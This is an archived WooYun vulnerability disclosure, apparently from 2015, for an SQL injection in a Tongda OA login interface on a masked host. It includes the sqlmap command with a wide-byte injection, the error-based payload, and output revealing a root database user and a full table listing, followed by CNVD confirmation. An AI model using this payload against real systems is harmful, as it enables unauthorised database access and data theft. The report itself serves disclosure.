乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
**.**.**.**/
请联系管理员 错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1SQL语句: select * from EXT_USER where USER_ID='運' '文件:/interface/auth.php
sqlmap -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20" --dbms=mysql --tamper=between
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 2136 FROM(SELECT COUNT(*),CONCAT(0x7163746871,(SELECT (CASE WHEN (2136=2136) THEN 1 ELSE 0 END)),0x716e6a7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hsor---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 2136 FROM(SELECT COUNT(*),CONCAT(0x7163746871,(SELECT (CASE WHEN (2136=2136) THEN 1 ELSE 0 END)),0x716e6a7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hsor---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'root@%'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 2136 FROM(SELECT COUNT(*),CONCAT(0x7163746871,(SELECT (CASE WHEN (2136=2136) THEN 1 ELSE 0 END)),0x716e6a7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hsor---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 2136 FROM(SELECT COUNT(*),CONCAT(0x7163746871,(SELECT (CASE WHEN (2136=2136) THEN 1 ELSE 0 END)),0x716e6a7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hsor---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0Database: td_oa[813 tables]+------------------------------------+| session || user || version || address || address_group || affair || app_log || archive_tables || attachment || attachment_edit || attachment_module || attachment_position || attend_ask_duty || attend_config || attend_duty || attend_duty_shift || attend_evection || attend_holiday || attend_leave || attend_leave_manager || attend_machine || attend_manager || attend_out || attendance_overtime || bbs_board || bbs_comment || book_info || book_manage || book_manager || book_type || calendar || categories_type || censor_data || censor_module || censor_words || chatroom || connect_config || connect_db || countdown || cp_asset_keep || cp_asset_reflect || cp_asset_type || cp_assetcfg || cp_cptl_info || cp_dpct_sub || cp_prcs_prop || crm_account || crm_account_care || crm_account_contact || crm_action || crm_complain || crm_contract || crm_customer_service || crm_depository || crm_diary_setting || crm_email_html_model || crm_html_model || crm_marketing || crm_opportunity || crm_opportunity_products_list || crm_order || crm_order_products_list || crm_procurement_payment || crm_product || crm_product_type || crm_purchase_order || crm_purchase_order_products_list || crm_quotation || crm_quotation_products_list || crm_salepay || crm_solutions || crm_stockout || crm_stockout_products_list || crm_storage || crm_storage_products_list || crm_supplier || crm_supplier_contact || crm_sys_audit || crm_sys_code || crm_sys_code_type || crm_sys_entity || crm_sys_entity_index || crm_sys_entity_op || crm_sys_fast_new || crm_sys_field || crm_sys_layout_block || crm_sys_layout_item || crm_sys_list_view || crm_sys_list_view_color || crm_sys_list_view_default || crm_sys_list_view_field || crm_sys_list_view_map || crm_sys_list_view_order || crm_sys_list_view_rule || crm_sys_list_view_rule_parent || crm_sys_op || crm_sys_op_priv || crm_sys_op_priv_template || crm_sys_picklist || crm_sys_quick_link || crm_sys_relation || crm_sys_remind || crm_sys_remind_para || crm_sys_report || crm_sys_report_chart || crm_sys_report_column || crm_sys_report_dir || crm_sys_report_filter || crm_sys_report_filter_parent || crm_sys_report_group || crm_sys_report_summary || crm_sys_report_sysdefine || crm_sys_search || crm_sys_status || crm_sys_status_type || daemon_config || daemon_hardware_info || daemon_process_info || daemon_services_config || daemon_services_status || daemon_services_tmp || data_feiyong || data_kehufuwu || data_source || data_source_field || data_src || db_server || department || dept_map || diary || diary_comment || diary_comment_reply || diary_share || doc_approve_remark || doc_keywords || doc_print_log || doc_recv_data || doc_recv_priv || doc_send_data || doc_type || doc_user_data || doc_user_data2 || email || email_body || email_box || email_boxgroup || email_name || esb_info || esb_msg_recv || esb_msg_send || esb_workflow || esb_workflow_model || esb_workflow_model_send || esb_workflow_rule || exam_data || exam_flow || exam_paper || exam_quiz || exam_quiz_set || ext_dept || ext_user || field_date || fieldsetting || file_content || file_sort || flow_data_102 || flow_data_104 || flow_data_105 || flow_data_107 || flow_data_108 || flow_data_109 || flow_data_111 || flow_data_112 || flow_data_113 || flow_data_114 || flow_data_115 || flow_data_116 || flow_data_117 || flow_data_118 || flow_data_125 || flow_data_126 || flow_data_127 || flow_data_128 || flow_data_130 || flow_data_132 || flow_data_133 || flow_data_134 || flow_data_135 || flow_data_136 || flow_data_137 || flow_data_138 || flow_data_139 || flow_data_14 || flow_data_140 || flow_data_141 || flow_data_142 || flow_data_143 || flow_data_144 || flow_data_147 || flow_data_148 || flow_data_149 || flow_data_150 || flow_data_151 || flow_data_152 || flow_data_153 || flow_data_154 || flow_data_155 || flow_data_156 || flow_data_157 || flow_data_158 || flow_data_159 || flow_data_160 || flow_data_161 || flow_data_162 || flow_data_163 || flow_data_164 || flow_data_165 || flow_data_166 || flow_data_167 || flow_data_168 || flow_data_169 || flow_data_170 || flow_data_171 || flow_data_173 || flow_data_174 || flow_data_175 || flow_data_176 || flow_data_178 || flow_data_179 || flow_data_180 || flow_data_181 || flow_data_182 || flow_data_184 || flow_data_185 || flow_data_186 || flow_data_187 || flow_data_188 || flow_data_189 || flow_data_190 || flow_data_193 || flow_data_196 || flow_data_198 || flow_data_199 || flow_data_200 || flow_data_201 || flow_data_203 || flow_data_204 || flow_data_205 || flow_data_206 || flow_data_207 || flow_data_208 || flow_data_209 || flow_data_210 || flow_data_211 || flow_data_212 || flow_data_214 || flow_data_215 || flow_data_216 || flow_data_217 || flow_data_219 || flow_data_220 || flow_data_221 || flow_data_222 || flow_data_223 || flow_data_224 || flow_data_225 || flow_data_226 || flow_data_227 || flow_data_228 || flow_data_229 || flow_data_230 || flow_data_231 || flow_data_232 || flow_data_233 || flow_data_234 || flow_data_235 || flow_data_238 || flow_data_239 || flow_data_240 || flow_data_241 || flow_data_242 || flow_data_243 || flow_data_244 || flow_data_245 || flow_data_246 || flow_data_248 || flow_data_249 || flow_data_251 || flow_data_252 || flow_data_253 || flow_data_254 || flow_data_256 || flow_data_258 || flow_data_259 || flow_data_260 || flow_data_261 || flow_data_262 || flow_data_263 || flow_data_264 || flow_data_265 || flow_data_266 || flow_data_267 || flow_data_268 || flow_data_269 || flow_data_270 || flow_data_271 || flow_data_273 || flow_data_274 || flow_data_275 || flow_data_276 || flow_data_277 || flow_data_278 || flow_data_279 || flow_data_280 || flow_data_283 || flow_data_284 || flow_data_285 || flow_data_286 || flow_data_288 || flow_data_289 || flow_data_290 || flow_data_291 || flow_data_294 || flow_data_295 || flow_data_297 || flow_data_298 || flow_data_299 || flow_data_300 || flow_data_301 || flow_data_302 || flow_data_303 || flow_data_304 || flow_data_305 || flow_data_306 || flow_data_307 || flow_data_308 || flow_data_310 || flow_data_311 || flow_data_312 || flow_data_313 || flow_data_314 || flow_data_315 || flow_data_316 || flow_data_317 || flow_data_318 || flow_data_319 || flow_data_320 || flow_data_321 || flow_data_322 || flow_data_323 || flow_data_324 || flow_data_325 || flow_data_326 || flow_data_327 || flow_data_328 || flow_data_329 || flow_data_330 || flow_data_331 || flow_data_332 || flow_data_333 || flow_data_334 || flow_data_335 || flow_data_336 || flow_data_337 || flow_data_338 || flow_data_339 || flow_data_342 || flow_data_343 || flow_data_344 || flow_data_345 || flow_data_346 || flow_data_348 || flow_data_349 || flow_data_35 || flow_data_350 || flow_data_351 || flow_data_357 || flow_feedback_common || flow_form_type || flow_form_version || flow_hook || flow_manage_log || flow_print_tpl || flow_priv || flow_process || flow_query_tpl || flow_report || flow_report_priv || flow_rule || flow_run || flow_run_attach || flow_run_data || flow_run_feedback || flow_run_hook || flow_run_log || flow_run_prcs || flow_sort || flow_timer || flow_type || flow_version || form_sort || gbt_conf || gwiki_cate || gwiki_fav || gwiki_log || gwiki_priv || gwiki_tag || gwiki_template || gwiki_term || gwiki_term_final || gwiki_term_temp || hr_card_module || hr_code || hr_insurance_para || hr_integral_data || hr_integral_item || hr_integral_item_type || hr_integral_oa || hr_manager || hr_recruit_filter || hr_recruit_plan || hr_recruit_pool || hr_recruit_recruitment || hr_recruit_requirements || hr_sal_data || hr_staff_care || hr_staff_contract || hr_staff_incentive || hr_staff_info || hr_staff_labor_skills || hr_staff_learn_experience || hr_staff_leave || hr_staff_license || hr_staff_reinstatement || hr_staff_relatives || hr_staff_title_evaluation || hr_staff_transfer || hr_staff_work_experience || hr_training_plan || hr_training_record || hr_welfare_manage || html_model || im_cluster || im_discuss_group || im_discuss_maxmsgid || im_discuss_msg || im_group || im_group_maxmsgid || im_group_msg || im_message_cache || im_offline_file || index_article || index_keyword || index_search || interface || ip_rule || itask || itask_body || itask_category || itask_idea || itask_log || itask_msg || itask_tag || jinelog || login_app || meeting || meeting_comment || meeting_equipment || meeting_room || meeting_rule || message || message2 || mobile_device || mobile_seal || module_priv || mytable || netchat || netdisk || netmeeting || news || news_comment || notes || notify || oa_cyclesource_used || oa_source || oa_source_used || oc_log || office_depository || office_products || office_task || office_transhistory || office_type || picture || plan_type || portal || pre_common_addon || pre_common_admincp_cmenu || pre_common_admincp_group || pre_common_admincp_member || pre_common_admincp_perm || pre_common_admincp_session || pre_common_admingroup || pre_common_adminnote || pre_common_advertisement || pre_common_advertisement_custom || pre_common_banned || pre_common_block || pre_common_block_item || pre_common_block_item_data || pre_common_block_permission || pre_common_block_style || pre_common_cache || pre_common_credit_log || pre_common_credit_rule || pre_common_credit_rule_log || pre_common_credit_rule_log_field || pre_common_cron || pre_common_district || pre_common_diy_data || pre_common_domain || pre_common_failedlogin || pre_common_friendlink || pre_common_invite || pre_common_magic || pre_common_magiclog || pre_common_mailcron || pre_common_mailqueue || pre_common_member || pre_common_member_connect || pre_common_member_count || pre_common_member_field_forum || pre_common_member_field_home || pre_common_member_log || pre_common_member_magic || pre_common_member_profile || pre_common_member_profile_setting || pre_common_member_security || pre_common_member_stat_field || pre_common_member_stat_fieldcache || pre_common_member_stat_search || pre_common_member_stat_searchcache || pre_common_member_status || pre_common_member_validate || pre_common_member_verify || pre_common_member_verify_info || pre_common_myapp || pre_common_myapp_count || pre_common_myinvite || pre_common_mytask || pre_common_nav || pre_common_onlinetime || pre_common_plugin || pre_common_pluginvar || pre_common_process || pre_common_regip || pre_common_report || pre_common_searchindex || pre_common_secquestion || pre_common_session || pre_common_setting || pre_common_smiley || pre_common_sphinxcounter || pre_common_stat || pre_common_statuser || pre_common_style || pre_common_stylevar || pre_common_syscache || pre_common_task || pre_common_taskvar || pre_common_template || pre_common_template_block || pre_common_template_permission || pre_common_uin_black || pre_common_usergroup || pre_common_usergroup_field || pre_common_word || pre_connect_feedlog || pre_connect_memberbindlog || pre_connect_tlog || pre_forum_access || pre_forum_activity || pre_forum_activityapply || pre_forum_announcement || pre_forum_attachment || pre_forum_attachmentfield || pre_forum_attachtype || pre_forum_bbcode || pre_forum_creditslog || pre_forum_debate || pre_forum_debatepost || pre_forum_faq || pre_forum_forum || pre_forum_forum_threadtable || pre_forum_forumfield || pre_forum_forumrecommend || pre_forum_groupcreditslog || pre_forum_groupfield || pre_forum_groupinvite || pre_forum_grouplevel || pre_forum_groupranking || pre_forum_groupuser || pre_forum_imagetype || pre_forum_medal || pre_forum_medallog || pre_forum_memberrecommend || pre_forum_moderator || pre_forum_modwork || pre_forum_onlinelist || pre_forum_order || pre_forum_poll || pre_forum_polloption || pre_forum_pollvoter || pre_forum_post || pre_forum_post_tableid || pre_forum_postcomment || pre_forum_postlog || pre_forum_postposition || pre_forum_poststick || pre_forum_promotion || pre_forum_ratelog || pre_forum_relatedthread || pre_forum_rsscache || pre_forum_spacecache || pre_forum_statlog || pre_forum_thread || pre_forum_threadclass || pre_forum_threadlog || pre_forum_threadmod || pre_forum_threadtype || pre_forum_trade || pre_forum_tradecomment || pre_forum_tradelog || pre_forum_typeoption || pre_forum_typeoptionvar || pre_forum_typevar || pre_forum_warning || pre_home_album || pre_home_album_category || pre_home_appcreditlog || pre_home_blacklist || pre_home_blog || pre_home_blog_category || pre_home_blogfield || pre_home_class || pre_home_click || pre_home_clickuser || pre_home_comment || pre_home_docomment || pre_home_doing || pre_home_favorite || pre_home_feed || pre_home_feed_app || pre_home_friend || pre_home_friend_request || pre_home_friendlog || pre_home_notification || pre_home_pic || pre_home_picfield || pre_home_poke || pre_home_pokearchive || pre_home_share || pre_home_show || pre_home_specialuser || pre_home_userapp || pre_home_userapp_stat || pre_home_userappfield || pre_home_viewlog || pre_home_visitor || pre_portal_article_content || pre_portal_article_count || pre_portal_article_related || pre_portal_article_title || pre_portal_article_trash || pre_portal_attachment || pre_portal_category || pre_portal_category_permission || pre_portal_comment || pre_portal_topic || pre_portal_topic_pic || pre_ucenter_admins || pre_ucenter_applications || pre_ucenter_badwords || pre_ucenter_domains || pre_ucenter_failedlogins || pre_ucenter_feeds || pre_ucenter_friends || pre_ucenter_mailqueue || pre_ucenter_memberfields || pre_ucenter_members || pre_ucenter_mergemembers || pre_ucenter_newpm || pre_ucenter_notelist || pre_ucenter_pms || pre_ucenter_protectedmembers || pre_ucenter_settings || pre_ucenter_sqlcache || pre_ucenter_tags || pre_ucenter_vars || proj_bug || proj_comment || proj_cost || proj_field_date || proj_fieldsetting || proj_file || proj_file_log || proj_file_sort || proj_forum || proj_priv || proj_project || proj_task || proj_task_log || rms_file || rms_lend || rms_roll || rms_roll_room || sal_data || sal_flow || sal_item || salau_attachment || salau_b_county || salau_b_netstation || salau_b_priv_user || salau_b_substation || salau_b_updatelog || salau_example || salau_example_log || salau_example_type || salau_jyjxtqd || salau_month_content || salau_month_log || salau_month_title || salau_month_view || salau_newswwaringlines || salau_newwaring_updatelog || salau_newwaringallpolicy_old || salau_newwaringcount || salau_newwaringlines || salau_newwaringlineslth || salau_newwaringlinessw || salau_newwaringpolicy_old || salau_newwaringsum || salau_sgyjqd || salau_suggest || salau_suggest_log || salau_waringalldetail || salau_waringallpolicy || salau_waringdept || salau_waringdetail || salau_waringinfo || salau_waringinfoxq || salau_waringlines || salau_waringpolicyinfo || salau_waringpolicynew || salau_waringset || salau_waringtmp || salau_week_content || salau_week_log || salau_week_title || salau_yjmbk || salau_yjqd || score_date || score_flow || score_group || score_item || score_self_data || seal || seal_log || secure_key || secure_log || secure_rule || sms || sms2 || sms2_priv || sms3 || sms_body || sys_code || sys_function || sys_log || sys_menu || sys_para || task || taskcenter || unit || url || user_ext || user_group || user_map || user_online || user_priv || vehicle || vehicle_maintenance || vehicle_oil_use || vehicle_operator || vehicle_usage || vi_flow_run || vote_data || vote_item || vote_title || webmail || webmail_body || weixun_share || weixun_share_topic || wiki_ask || wiki_ask_answer || wiki_comment || wiki_info || winexe || word_model || work_detail || work_person || work_plan || wresource_detail || zbap_paiban |+------------------------------------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 16:46
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无